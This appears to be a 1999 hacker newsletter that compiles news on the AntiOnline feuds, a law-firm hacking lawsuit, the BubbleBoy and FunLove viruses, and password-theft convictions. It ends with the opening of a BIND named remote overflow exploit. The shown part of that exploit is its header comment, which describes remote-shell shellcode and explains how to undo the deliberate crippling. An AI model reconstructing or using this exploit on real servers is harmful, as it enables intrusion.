Now how stupid is that? What would my answer be, something like "Um, no".
Not a very stimulating Q&A if you ask me.
So, instead of wasting my time and yours, I decided that I'd simply cut to
the chase, and answer what appear to be some of the major allegations,
accusations, and other such tidbits that some people seem obsessed over.
AntiOnline & PacketStorm
First off, let me say that I didn't shut down PacketStorm, and neither did
Harvard. Ken Williams is the sole person responsible for that site being
shut down. He chose to take a popular forum which was designed to
disseminate information related to computer security, and abuse his own
creation in order to harass someone. Sure, post satire about myself or my
website. I truly don't care, and in many cases, I have even promoted such
websites on AntiOnline. One such satire site that I've linked to several
times is "AntiOffline.com". Personally, I consider satire as one of the
greatest type compliments one can get. However, what Ken did far surpassed
simple satire. By posting a photo of my younger sister (who was a minor at
the time), along with her full name and address, he successfully started a
mass campaign of harassment against her and my family. This I wouldn't
tolerate. I don't care how popular of a site it was, or how valuable of a
resource it was. It was abused by Ken Williams for his own perverse sense
of amusement, at the cost of my family.
As for all of this "threaten to sue" hype which soon followed. I never did
any such thing. I'm not sure which University Official ever told Ken
Williams that, if any, but he was certainly mistaken. I sent a simple one
page e-mail to the provost's office asking them to review the contents of
the site against their acceptable use policy. Despite Ken's claims that
there wasn't any "offending" material on the site, the university reviewed
it, and chose to shut it down. A major and prestigious university like
Harvard wouldn't simply shut down a site because some pissant like myself
sent them an e-mail, unless there was a very good reason to do so. Use
your common sense people.
However, what Ken Williams did was a very successful campaign of pity
afterwards. I will admit that. "A poor college student who's website was
shut down by an evil corporation called AntiOnline. Who's college career
has been ruined, and all of his hard work lost". Truth of the matter is
that Ken is in his 30s, and isn't some naive little college freshmen. He
got his site shut-down by harassing a 17 year old girl, which shortly
after being shutdown, Ken sold for a reported $125,000 to Kroll.
Poor Ken.
AntiOnline & Attrition
This is even more stupid than Ken Williams. Despite all of the crap, and
there really isn't a better word for it, which has pored out of Brian
Martin and his Attrition.org site, I think I can sum up events in one
small paragraph
AntiOnline was asked by the FBI to help investigate a group called "HFG"
which broke into the New York Times' Website. AntiOnline does some
digging, and turns over its findings. Shortly there after, Brian Martin,
founder of Attrition.org, and someone that no one at AntiOnline had ever
had any contact with before, was raided by the FBI. Ever since then, for
some strange reason, Brian Martin has attempted to do anything and
everything he can to discredit myself and AntiOnline. Wonder why? Is it
because I'm an evil menace to society that threatens the very existence of
the internet and all that is good? I wouldsubmit to you that Brian
Martin's motivations are far more geared towards protecting his own ass,
than they are geared towards protecting society's ass. Once again, use
your common sense.
What exactly does AntiOnline Do?
That's something I see asked a lot on "underground" type webpages. To be
frank, we're not a public company, and it really isn't anybody's business
except those that we work with. I can, however, tell you this. The fact
that nearly every malicious hacker (or cracker if you prefer the term)
dislikes AntiOnline is actually good for us, and is the exact position I
want to be in. Some people even "joke" that I intentionally try to "piss
off large groups of people at a time". Well, it's not just a joke, it's
the truth. I think I'm pretty good at doing it too. We average between
200-500 intrusion attempts against one of our systems AN HOUR, and every
time I piss another segment of the cyber-population off, that number
skyrockets. We probably have one of the most targeted networks on the
internet today, and we take full advantage of that. Do you think that we
let the type of data that we're able to collect and log just go to waste?
I don't ;-)
Is AntiOnline Being Investigated By The FBI?
To tell you the truth, I doubt it, but I don't know for sure. But, there's
a reason why I don't know for sure. The FBI doesn't talk to anyone about
who they are/have investigated. Anyone that has ever worked with the FBI
in any manner, can tell you that they, as a rule, keep quite in order to
protect any investigation. If they were to deny reports about us being
investigated, that would confirm in the minds of others that they are
being investigated, when the FBI comes up with a "no comment" answer. Make
sense?
Here's where things get funny. The person that "blew the lid off of the
story" that AntiOnline was being investigated by the FBI is none other
than, you guessed it, Brian Martin of Attrition. He told a reporter that
an FBI agent "informed him" about the active investigation.
Common sense time. Would the FBI raid someone (like Brian Martin was), and
then shortly there after begin telling that person about all of the other
investigations that they are doing so that they could spread the word all
over the Internet and ruin their case?
Personally, I would highly doubt that the FBI would consult with us if
they suspected, or were investigating the possibility, that AntiOnline was
some evil criminal empire that paid people off to break into high profile
websites so that we could post an interview.
Get real people.
Does it bother you that everyone hates you. Why or why not?
This is something that I actually saw posted on the message board. To be
honest, at this point in my life, my goal is not to become loved in the
hearts of the masses. I'm not running for political office, so popularity
doesn't count. I have goals in my life that I want to achieve. Some of
these goals are short-term, some of them are long-term. Right now, at the
age of 21 (as of October), I'm exactly where I want to be. My professional
career is on track, financially I'm in good shape, my personal life is
where I want it to be, and I can say that every day brings me closer to
the goals that I have set for myself. Who could ask for more? Sure, I have
to put up with a lot more flack and B.S. than the average 21 year old. But
I'll tell you this, every minute is worth it.
To learn more about John Vranesevich as he was seen through the eyes of at
least one reporter for a respected news outlet, read this Forbes article.
- RM
@HWA
42.0 Strange Corporate Hacking Saga
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.wired.com/news/print/0,1294,32488,00.html
by Craig Bicknell
3:00 a.m. 12.Nov.1999 PST Judge Thomas Penfield Jackson may have a head
full of Microsoft hoo-ha. But he's going to have to make some room for
another case.
No lofty antitrust issues here. This one's a weird little cyber-drama
starring a personal data-sales Web site called Dig Dirt, its
cybersquatting owner, and a prestigious law firm that allegedly hacked
into Dig Dirt's digs.
Michael Moore, owner of DigDirt.com's parent, Moore Publishing, this week
filed suit in US District Court for the District of Columbia accusing the
august Washington law firm of Steptoe & Johnson of launching a "cyber war"
against Moore Publishing and Dig Dirt.
He's demanding US$10 million in damages, and the case has landed in
Jackson's court.
Moore charges that, among other things, Steptoe employees cracked into Dig
Dirt and other Moore Publishing sites some 750 times, posted defamatory
messages about Moore on Usenet, and tried to cover it all up by doing
their evil deeds under an e-identity swiped from an Alexandria,
Virginia, furniture store owner.
Steptoe declined comment beyond this terse statement: "Steptoe & Johnson
LLP denies the allegations against it. Unlike Moore Publishing Company
Inc. and its counsel, Steptoe & Johnson LLP will not litigate this case in
the media. We will respond in the Court where these matters are
properly addressed."
No such reservations for Moore's attorney, solo practitioner Rodney
Sweetland, who happily offered up his version of the story.
On 4 August, according to Sweetland, somebody from Steptoe cracked into
Dig Dirt, a site that fronts an enormous database of personal data gleaned
from public records. Dig Dirt sells the data to private investigators,
lawyers, and law enforcement agencies.
The supposed Steptoe hacker did no damage, but left obvious electronic
tracks back to Steptoe's servers.
The hacker didn't actually break in through digdirt.com, however. He broke
in through an alternate URL, CDBInfo.com.
The URL bears a striking resemblance to the name CDB Infotek, a
data-selling competitor to Dig Dirt. In fact, CDB Infotek is the
data-selling competitor that Steptoe & Johnson uses when it needs
background dirt on somebody.
Why the heck does CDBInfo.com lead to Dig Dirt's site? Well, there's this
matter of Moore Publishing's apparent side business -- cybersquatting.
Moore owns dozens of URLs, including campaign-related domains like
"Whitmanforsenate.com," names of other database competitors, and even the
names of some prominent law firms, including SteptoeJohnson.com. Sweetland
wouldn't confirm that his client's domains were for sale.
To continue. After the initial "crack," Sweetland contacted Steptoe &
Johnson and demanded an explanation. Steptoe denied all guilt. In early
September, Moore Publishing filed suit in Jackson's court, demanding
Steptoe pony up $800,000 to pay for its supposed misdeeds.
Steptoe refused the proposed settlement and filed a motion to dismiss the
case, countering that there had been no hack. The law firm said one of its
employees "did the Internet equivalent of knocking on the wrong door,"
accidentally ending up at Dig Dirt when he'd been headed for CDB
Infotek. Moore's suit, claimed Steptoe, was "yet another way of making
money from the pernicious activity of cyber-squatting."
Meanwhile, according to the expanded Moore suit filed this week, a whole
new wave of Steptoe-led computer attacks was already under way.
The attacks began shortly after Sweetland contacted Steptoe about the
first "attack" in early August, the suit charges. Steptoe tapped one of
its computer systems employees, Thomas Felt, to investigate Moore
Publishing's claims.
Moore Publishing sites were subsequently hit by a wave of
denial-of-service attacks, apparently designed to overwhelm Moore's
servers. Moore determined the attacks were originating in the servers of a
Virginia Net hosting company.
Sweetland subpoenaed the hosting company's records, which revealed the
precise origin of the assault: the account of one Lois Gloor, a furniture
store owner in Alexandria.
Sweetland called Gloor. She had no clue what he was talking about, he
said. But she did say a part-time consultant had recently helped set up
all her computer systems. The consultant's name: Thomas Felt.
According to Sweetland, Felt swiped Gloor's passwords and account info,
using them first to launch numerous assaults against Moore Publishing in
early September, then to post defamatory messages about Moore on Usenet.
One such post read, in part: "I guess business must be bad ... now they
are trying to shake down law firms ... ask Michael why he has filed a sham
lawsuit against Steptoe.... I guess he needs the money. Just thought
everyone should know what kind of people these guys are ... the
lowest of the low, and now they are turning to computer crime."
As a result of the supposed identity heist and the Usenet posts, Moore
Publishing has expanded its case to include charges of computer fraud and
defamation.
Was the supposed assault on Dig Dirt ordered from on high within Steptoe?
Sweetland said he doesn't think so.
"It looks to me like a bunch of cowboys in the computer department went
off the reservation," he said.
That doesn't absolve Steptoe of responsibility, said Sweetland. And if
someone in the firm was upset by Moore's first suit or his client's
apparently self-interested ownership of the SteptoeJohnson.com domain,
they chose a poor way to show it.
"To the extent that Steptoe Johnson had any contention with [Moore's] use
of the [SteptoeJohnson.com] domain, there are legitimate avenues of
redress," he said. "They could have gone to NSI, but they didn't. What you
can't do is hack, defame, and use denial-of-service attacks, and
that's what happened."
Steptoe undoubtedly will offer up a different version of events, and it'll
be up to Judge Jackson to decide what's what.
After his experiences with the Microsoft trial, Jackson should have a good
grasp of the terrain.
"He's probably one of the most computer-savvy judges out there, by
necessity," said Sweetland.
@HWA
43.0 BubbleBoy Breaks Out of Lab - Found on Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Scores
The most recent media darling virus BubbleBoy, has now
been found in the wild. A Japanese web site devoted to
collecting viruses has posted BubbleBoy for all to
download. It was previously thought that BubbleBoy
existed only in the lab. BubbleBoy only effects users on
the English and Spanish versions of Microsoft Outlook.
MSNBC
http://www.msnbc.com/news/333265.asp
BubbleBoy virus found on Net
Web page devoted to collecting viruses has a copy;
First-of-its-kind program infects users just reading e-mail
By Bob Sullivan
MSNBC
Nov. 11 The BubbleBoy virus, which sent
shudders through the antivirus community earlier
this week, is no longer just a lab rat. MSNBC has
confirmed that the virus and an updated
version 1.1 of the program has now been
posted on a Web page hosted in Japan devoted
to collecting viruses. A look at the virus reveals a
few more details about the program.
WHILE THE VIRUS is now available for download
and imitation by virus writers, there as yet have been no
reported victims of the program.
A text document connected to the virus claims the
nefarious program was written by a virus writer named
Zulu and suggests the program originated in Argentina.
That text file also goes on to credit the security expert
who first discovered the vulnerability exploited by the virus:
First e-mail worm (without using attachments),
according to BubbleBoy.txt. It uses a vulnerability
discovered by Georgi Guninski in which many versions of
Internet Explorer 5 allow any HTML file or e-mail to write
files without ActiveX authorization.
It also notes the virus will only work in English and
Spanish versions of Microsoft Outlook.
The long-feared new breed of computer virus emerged
late Monday, according to antivirus firms. The so-called
BubbleBoy virus can infect Internet users when they open,
or even simply preview, an infected e-mail.
Historically weve always said, as long as you dont
open attachments, youre safe, Network Associates
spokesman Sal Viveros said. Thats not true any more.
It was apparently created by a a fan of the U.S.- TV
sitcom Seinfeld. The name appears to have been taken
from an episode of the show. Another famous character, the
Soup Nazi, is referenced in the virus code itself, as is
Vandelay an apparent reference to Vandelay Industries,
a fictitious company where hapless George Costanza
claimed he was employed.
The virus arrives with the subject line Bubbleboy is
Back! The body of the message includes the text The
BubbleBoy incident, pictures and sounds.
Theres also a link to a non-working Web page
http://www.towns.com/d=
orms/tom/bblboy.htm.
Bubbleboy is a proof of concept virus that has no
dangerous payload, meaning it doesnt attempt to delete or
alter files. But it does have the ability to create a
Melissa-like mail storm as it sends copies of itself to every
e-mail address in the victims address book.
For over a year, security experts have raised the
concern that e-mail itself rather than an e-mail
attachment can transmit a computer virus. The problems
are caused by e-mail readers that render HTML, like
Microsofts Outlook or Eudora Pro. Since these programs
allow Web-page-like formatting within the body of the
message, they also allow execution of code. W
ith Outlook
Express, that code can be executed even before the
message is open, thanks to the preview pane included
with the software. (Microsoft is a partner in MSNBC.)
But while the possibility has existed theoretically,
BubbleBoy is the first virus to exploit it, Viveros said.
Thanks to virus crises like Melissa, most Internet users
seem used to the idea that opening e-mail attachments can
expose their computers but reading e-mail itself has
always seemed safe. Not any more, according to Viveros.
This really changes the way people need to react to
viruses, he said. You cant really tell people, Dont open
e-mail.
In fact, its unclear exactly how users of
HTML-enabled e-mail readers can protect themselves from
such viruses. Regularly updating antivirus software will filter
out most viruses, but virus writers are usually a half-step
ahead of antivirus software new ill-intentioned programs
are almost always able to slip through defenses during the
first few hours after their release.
Until yesterday, I was telling people, Dont open
attachments unless you know why the person sent it to you,
said Dan Schraeder, vice president of new technologies at
antivirus firm Trend Micro. Now I get nervous just opening
e-mail.
BubbleBoy was sent anonymously to Network
Associates Monday night, Viveros said, probably by the
author. At that time, it was declared just a lab rat no
antivirus firm had reported seeing BubbleBoy in the wild.
This virus has not been posted at any hack site we are
aware of. We dont expect to see variants of it popping up
all of the sudden, Schraeder said Tuesday.
But thats no reason to dismiss it.
Historically, what weve seen is people take
proof-of-concept viruses and create dangerous payloads
for them, Viveros said.
HOW THE VIRUS WORKS
The virus only affects Microsoft Outlook users with
Internet Explorer 5.0, and only if Windows Scripting Host is
installed (standard in Windows 98 and Windows 2000
installations). If security settings for Internet Zone in IE5 are
set to High, the worm will not be executed. It does not run
on Windows NT.
According to Schraeder, the virus actually takes
advantage of a security flaw in Microsofts ActiveX
technology that was discovered in August. Two
components of Internet Explorer 4.0 and 5.0,
scriptlet.typelib and Eyedog, are incorrectly labeled as
trusted meaning they can retrieve and alter critical
information on a users computer. BubbleBoy calls on these
controls through scripting in the body of an e-mail message
in order to access a victims computer.
Users who have installed Microsofts patch for the flaw
(available from this Web site) are not vulnerable to
BubbleBoy, but they may be vulnerable to other
HTML/e-mail attacks.
This is a good wake-up call for us, to remind people
they need to get the latest security updates and update their
virus scanning engine, Schraeder said.
@HWA
44.0 'Fun Love' Warning Issued
~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by nvirb
A virus known as FunLove, appears as an executable
file, and has already infected a large European
company. When an administrator logs onto an infected
WindowsNT system the virus grants administrator rights
to all users. Descriptions for the virus have been added
to Anti-Virus companies definition files.
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,1018115,00.html?chkpt=zdnntop
--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------
Researchers warn about 'FunLove' virus
By Jim Kerstetter, PC Week
November 11, 1999 1:40 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,1018115,00.html
There's nothing tender about the new FunLove virus.
The virus, technically called W32.FunLove, brought down the servers of a large company in
Europe and has been detected in companies in the U.S., as well, according to researchers at
Symantec Corp.'s (Nasdaq:SYMC) AntiVirus Research Center.
The good news is that it shouldn't spread all that fast because it doesn't have the ability to e-mail
itself like the Melissa virus, said Charles Renert, director of research at SARC. The bad news is
that it uses a new way to attack the file security system of the Windows NT operating system. The
virus may also use the network to spread itself.
"It's a little bit of an evolution as far as virus writing is concerned," said Renert.
How it works
The virus appears as an executable file running on all flavors of Windows, from Windows 95 on
up. The only way to recognize that a machine has been infected is by finding the fclss.exe file the
virus drops into the Windows System directory. In turn, it infects applications with EXE, SCR or
OCX extensions.
The real goal of the virus is to attack the Windows NT file security system. In order for the virus
to attack, it needs administrative rights on an NT server or workstation. Once an administrator
logs on to NT, the virus modifies the NT kernel so that every user has administrative rights to that
machine, regardless of the protection.
This means that a "guest" -- someone with the lowest possible rights on the system -- would be
able to read and modify all files, including files normally accessible only by the administrator.
Symantec officials said they have added virus definitions to recognize FunLove and should have a
tool available shortly to help repair an infected machine at
www.symantec.com/avcenter/download.html.
Earlier this week, researchers issued warnings about the so-called BubbleBoy virus -- actually a
self-replicating worm -- that can spread itself through Microsoft Corp.'s Outlook and Outlook
Express software.
@HWA
45.0 Simple nomad to speak at ToorCon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by skalor
TooRcon Computer Security Expo is proud to announce
that the keynote speaker for TooRcon 2000 will be
Simple Nomad of Nomad Mobile Research Center. Simple
Nomad will discuss the future of hacking as we approach
the new millennium.
TooRcon
http://www.toorcon.com
Nomad Mobile Research Center
http://www.nmrc.org
HNN Cons Page - more con information
http://www.hackernews.com/cons/cons.html
@HWA
46.0 Distributed Attempt to Break 56bit CS-Cipher
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by x-empt
Similar to projects from distributed.net and SETI@Home,
this project promises 10,000 Euros (roughly $10,500) to
whoever finds the correct encryption key. DCypher.Net,
accepting CS Group's CS-Cipher challenge, will attempt
to break their 56 bit key using a brute force attack in a
distributed computing effort. Currently the Win32 clients
are out and a Linux version will be out shortly.
(Hmmmmm no one has started an HNN team yet.)
Dcypher.net
http://www.dcypher.net/
@HWA
47.0 CallNet Admits to Security Blunder
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by no0ne
The UK based toll-free ISP CallNet 0800 admitted that
the financial security of thousands of their subscribers
was compromised after the VeriSign digital verification
system that was meant to secure their on line
transactions did not arrive on time. The online
registration which required users to enter their credit
card information to make available the discounts in
0800's services, went up last Wednesday and was only
taken down this week.
The UK Register
http://www.theregister.co.uk/991110-000015.html
Posted 10/11/99 1:56pm by Tim Richardson
Security hole found at CallNet 0800
CallNet 0800 compromised the financial security of thousands of Net users last week
after it admitted that its online registration system was not totally secure.
Although the toll-free ISP maintains there was never a problem with its servers, it has
revealed that the transaction process between the user and CallNet 0800 was not
secure.
The registration system that allowed people to register their credit card and personal
details online went live last Wednesday and was only shut down this week. Net users
need to register their credit card details with CallNet 0800 to take advantage of
cut-price telephone calls.
Keith Goodyear, VP of CallNet UK said the episode was an "oversight" by the
company.
The problem arose because the VeriSign digital certification system that would have
secured the online transactions was not delivered on time, claimed Goodyear.
CallNet is still waiting for the VeriSign certificate and has disconnected the online
sign-up service until it arrives and is in place.
"The chances of anyone's details being hacked [en route] are minimal," said
Goodyear, adding that there had been no reports of any security breaches.
But CallNet's apparent lackadaisical approach to security has angered some people.
One reader, who asked not to be named, said he was so worried when he found out
he intended to cancel his credit card just in case his security has been compromised.
Elsewhere, Simon Lofthouse, a spokesman for Britain's first digital certification
authority, Inter Clear Services, said: "At best this is careless, at worst negligent."
While Lofthouse agreed with Goodyear that the chances of people's personal details
being hacked were slim, he said it was simply too much of a risk to take.
"Chances are they wouldn't get hit, but what if they had? It's not just their reputation that
goes the drain, it is the whole industry [that has to carry the can]." ®
@HWA
48.0 Singapore Pair Sentenced After Posting Passwords
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by no0ne
Pang Soon Chen, 19, and David Kok Tuck Whye, 22, of
Singapore, have been sentenced for 8 and 22 months in
jail respectively after pleading guilty to stealing the user
names and passwords of SingNet customers and
students at the National University of Singapore. This
password theft was apparently accomplished using
NetBus. The pair then posted the names and passwords
they had stolen to the internet.
IT @ Asia One
http://it.asia1.com.sg/html/news/news004_19991111.html
2 youths jailed for hacking rampage
54 Became Their Victims
By CHANG AI-LIEN
TWO youths were yesterday jailed for hacking into the computer
systems of Internet users and posting their passwords on a public
website. Pang Soon Chen, 19, was sentenced to 15 months' jail
while David Kok Tuck Whye, 22, was jailed eight months after they
pleaded guilty to the crimes.
Pang and Kok obtained the passwords of SingNet and National
University of Singapore Internet account holders illegally, used some
of these accounts to surf and posted some passwords publicly on
"Sicknet", a website hosted in the US.
The district court heard that the youths had known each other since
1997. In December last year, Kok told Pang that he was having
problems with his personal computer system -- it would shut down for
no apparent reason or the CD-ROM tray would eject itself.
Pang found out that Kok's system had been hacked into by a Netbus
program. He then downloaded the program from a website and told
Kok about it. Pang and Kok used the program to get the names and
passwords of their victims, by connecting it to users' computer
systems and executing certain commands.
Pang then designed the Sicknet webpage to show off his capabilities
and posted a list of SingNet user names and passwords in it. Kok
then suggested that he should add more names to the page to give
the impression that it had been created by a group of people.
Pang sent mass messages through the Internet Relay Chat inviting
people to visit the page, and it caught the attention of SingNet
because of its similarity to SingNet's own webpage. The duo was
arrested in March this year. Pang, unemployed, had faced 85
charges, including unauthorised access to computer materials and
services, and unauthorised disclosure of access code.
Kok, a Nanyang Academy of Fine Arts student then, had faced 26
similar or related charges.
Calling for a deterrent sentence, Deputy Public Prosecutor
Christopher Ong referred to Chief Justice Yong Pung How's recent
landmark decision which sent a teenage hacker to a four-month jail
term.
In this case, he said the two culprits had gone on a rampage, hacking
the computer systems of a total of 54 victims, and the website was
created to show off their prowess.
"The arrogance and maliciousness of the accused persons is
self-evident."
Yesterday, the duo showed no emotion when District Judge F.G.
Remedios sentenced them to jail.
Straits Times
@HWA
49.0 Singapore Agencies to Investigate Defacement of Government Web Site
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by lamer
The Ministry of Law's Integrated Land Information
Service in Singapore shut down its web site pending an
investigation. The web site was defaced earlier this
week. The National Computer Board (NCB) and the
Singapore Computer Response Team (SingCert) will work
with National Computer Systems (NCS) during the
investigation.
IT @ Asia One
http://it.asia1.com.sg/html/news/news001_19991111.html
Mirror of Defaced Page - provided by Attrition.org
http://www.attrition.org/mirror/attrition/1999/11/09/www.inlis.gov.sg/
IT @ Asia One;
Govt web server shut down after hacker strike
By CHONG CHEE KIN
A GOVERNMENT Internet server here has been shut down for
investigations after it was hacked into and a home page defaced on
Tuesday. The site is the Ministry of Law's Integrated Land Information
Service (Inlis) on the Internet.
The service gives details about land in Singapore, and allows users
to pinpoint locations on a map and print them out.
The home page was defaced at about 6 pm, the ministry said
yesterday, in response to questions. In a statement, it said the Inlis
operator, National Computer Systems (NCS), shut down the web
server when it found out that the home page had been defaced.
"Only the main page of the public website was defaced. Other
systems, transaction records and the data on Inlis were not affected."
Reassuring the users of the system, it stressed that the transactions
done on Inlis were not compromised.
The National Computer Board (NCB) and the Singapore Computer
Response Team (SingCert) were helping NCS in investigating the
incident.
The ministry added that NCS had lodged a police report. The
operator had indicated that Inlis services would resume as soon as
possible.
This is the third such attack on government or Singapore-related
websites in two months.
When contacted yesterday about this and the measures being taken,
the NCB said the incidents showed the risk the world faced as
computers and IT became an integral part of life.
Hacking was a continual problem as new loopholes were found every
day.
In a statement, it said: "The challenge for us is to stay vigilant, to keep
abreast of and apply the latest available measures to deal with
security problems.
"This is a continuing challenge that all website administrators will
have to cope with."
It added that the websites it managed were checked and updated
with the latest security software.
But protective measures could not take up too much resources or
made it unnecessarily inconvenient for the public to access services.
The NCB added that it had set up SingCert -- a computer security
team -- in 1997 to help Singapore in the detection and prevention of
security-related incidents on the Internet.
It was also working closely with the police on the recent incidents.
The board said hacking was a serious crime and it hoped
investigations would be completed soon and the culprits brought to
book.
Straits Times
@HWA
50.0 BSA Targets IRC For Piracy
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by arab_terrorist9
The Business Software Alliance (BSA) today announced
it has launched a new initiative aimed at shutting down
illegal trafficking in software on the Internet. As part of
the initiative, BSA has filed a lawsuit against
twenty-five individuals allegedly participating in the
"warez4cable" IRC channel, an Internet forum used to
traffic in pirated software. This is the first lawsuit ever
filed against individuals for pirating software in an IRC
channel.
Business Software Alliance
http://www.bsa.org/pressbox/enforcement/index.html?/pressbox/enforcement/942331921.html
SOFTWARE WATCHDOG ATTACKS CYBERPIRACY
BSA Files Lawsuit Against 25 Individuals for Alleged Piracy in High-Speed
IRC Channel; Seizes Computers in California and Michigan
Washington, D.C. (11 November 1999) -- The Business Software Alliance
(BSA) today announced it has launched a new initiative aimed at shutting
down illegal trafficking in software on the Internet. As part of the
initiative, BSA has filed a lawsuit against twenty-five individuals
allegedly participating in the "warez4cable" IRC channel, an Internet
forum used to traffic in pirated software. This is the first lawsuit ever
filed against individuals for pirating software in an IRC channel.
In the past week, under the supervision of U.S. Marshals, BSA carried out
unannounced inspections of computer equipment at residences in Sacramento
and Downey, CA, and in Troy and West Bloomfield, MI, seizing five
computers. Under U.S. law, all twenty-five defendants named in the lawsuit
are potentially liable for damages up to $100,000 per copyrighted work
infringed.
"Because of the increased access to high-speed connections, piracy in IRC
channels is fast becoming one of the most popular ways to traffic in
illegal software on the Internet," said Bob Kruger, vice president of
enforcement for BSA. "That is why BSA is taking immediate action against
this aggressive form of piracy," continued Kruger.
The lawsuit results from months of intensive investigation by BSA's Online
Investigative Unit. By using a special subpoena procedure created by the
Digital Millennium Copyright Act enacted by Congress in 1998, BSA was able
to identify the individuals named in the suit and take legal action
against them. The lawsuit adds a new dimension to BSA's Internet
anti-piracy campaign that to date has involved the shutting down of
thousands of warez web sites and working closely with law enforcement to
promote criminal prosecutions.
"This lawsuit is part of BSA's on-going campaign to keep the Internet from
becoming a safe haven for the conduct of software piracy," said Kruger.
"Anyone who thinks that they can hide behind the anonymity of the Internet
to commit copyright infringement had better know that the law gives them
no quarter," continued Kruger.
**Since 1988, the Business Software Alliance (BSA) has been the voice of
the world's leading Software developers before governments and with
consumers in the international marketplace. Its members represent the
fastest growing industry in the world. BSA educates computer users on
software copyright; advocates public policy that fosters innovation and
expands trade opportunities; and fights software piracy. BSA worldwide
members include Adobe, Apple,
Attachmate, Autodesk, Bentley Systems, Corel Corporation, Lotus Development,
Macromedia, Microsoft, Network Associates, Novell, Symantec and Visio. BSA
websites: www.bsa.org; www.nopiracy.com.**
@HWA
51.0 Law Firm Sued Over Possible Cyber Attack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by no0ne
Once again the mainstream media is a little slow on the
uptake. Internetnews.com is finnally reporting on a
story that HNN mentioned over a month ago. Moore
Publishing of Pennsylvania is seeking more than $10
million dollars in damages from the Washington based
legal firm of Steptoe & Johnson. The suit alleges that an
employee of Steptoe & Johnson attempted to break in
to the computer systems of Moore Publishing. Steptoe
has vehemently denied the charges but Moore claims
that they have logs that will prove their case. The
attacks appear to have been launched as retaliation
when Moore Publishing registered the Internet address
steptoejohnson.com.
Internet News
http://www.internetnews.com/bus-news/article/0,1087,3_237441,00.html
HNN Archive for September 28, 1999
http://www.hackernews.com/arch.html?092899#3
Internet News;
Law Firm Accused of Cyberattack in Domain Dispute
November 11, 1999
By Brian McWilliams
InternetNews.com Correspondent
Business News Archives
Steptoe and Johnson, a leading Washington, D.C., law firm, is accused of
trying to settle a domain dispute by launching a cyberwar against a
cybersquatter that registered its name.
Steptoe is accused of hacking into a server operated by Moore Publishing
Co., which operates an information service for investigators called Dig
Dirt.
Moore has filed a lawsuit in US District Court against Steptoe, alleging
that the law firm repeatedly attempted to hack into its server in August
and later launched a denial of service attack against it. The complaint
also alleges that a Steptoe employee used a hijacked Internet account to
post a message in newsgroups defaming Moore.
Moore is seeking 10 million dollars in damages against Steptoe.
According to Rodney Sweetland, the attorney representing Moore, the
attacks appear to have been launched as retaliation when his client
registered the Internet address steptoejohnson.com.
"If they contended that my client violated the Lanham Act or was a
cybersquatter, there are legitimate means to take care of that. But
hacking and denial of service attacks are not part of the legitimate means
of dealing with it," Sweetland said.
Sweetland said that Steptoe has not initiated a domain dispute with
Network Solutions (NSOL). Steptoe officials were not available for
comment.
A speculative cybersquatter, Moore has also registered several other
domains that include the names of well known law firms, including
kpmgpeatmarwick.com and kirklandellis.com.
@HWA
52.0 New E-Zine Issues Released
~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by phonepunx and set-fw
Phone Punx Magazine #3 has been released with articles
on Caller ID, Trunked radio, ANI and more.
The newest release of the veteran H/P/C/V Spanish
ezine Saqueadores Edición Técnica is now available.
This issue features articles on Quantum Crypto, Hacking
PacketShaper, Tempest, UnderCon and a lot more.
Phone Punx Magazine #3
http://fly.to/ppn
Saqueadores Edición Técnica
http://www.set-ezine.org
@HWA
53.0 'Fixed' version of the new ADM-BIND exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
/*
* ADM CONFIDENTIAL -- (ADM Confidential Restricted when
* combined with the aggregated modules for this product)
* OBJECT CODE ONLY SOURCE MATERIALS
* (C) COPYRIGHT ADM Crew. 1999
* All Rights Reserved
*
* This module may not be used, published, distributed or archived without
* the written permission of the ADM Crew. Please contact your local sales
* representative.
*
* ADM named 8.2/8.2.1 NXT remote overflow - horizon/plaguez
*
* "a misanthropic anthropoid with nothing to say"
*
* thanks to stran9er for sdnsofw.c
*
* Intel exploitation is pretty straightforward.. should give you a remote
* shell. The shellcode will break chroot, do a getpeername on all open
* sockets, and dup to the first one that returns AFINET. It also forks and
* runs a command in case the fd duping doesn't go well. Solaris/SPARC is a
* bit more complicated.. we are going through a well trodden part of the
* code, so we don't get the context switch we need to have it populate the
* register windows from the stack. However, if you just hammer the service
* with requests, you will quickly get a context switch at the right time.
* Thus, the SPARC shellcode currently only breaks chroot, closes current
* fd's and runs a command.
* Also, the NetBSD shellcode doesn't break chroot because they stop the
* dir tricks. Of course, they allow mknods in chrooted environments, so
* if named is running as root, then it still might be expoitable.
* The non-exec stack patch version returns into a malloc'ed buffer, whose
* address can vary quite alot. Thus, it may not be as reliable as the other
* versions..
*
* We broke this just a little in order to raise the bar on using it
* (just slightly).. If you'd like to test it on your own box, put a shell
* in /adm/sh, or /adm/ksh for solaris on the target machine.
*
* This version: replaced 0x61,0x64,0x6d with 0x62,0x69,0x6e tnx Aphex.
* shell code where BIN should have been located was replaced with ADM
* simply replace the ADM code with BIN and you have a working copy.
*
* Note that you need ownership of an NS or have some way of fooling an NS to
* query your ip in order to run this exploit successfully.
* if you dunno what an NS is you're too lost to use this. - Cruciphux
*/
#include <stdio.h>
#include <unistd.h>
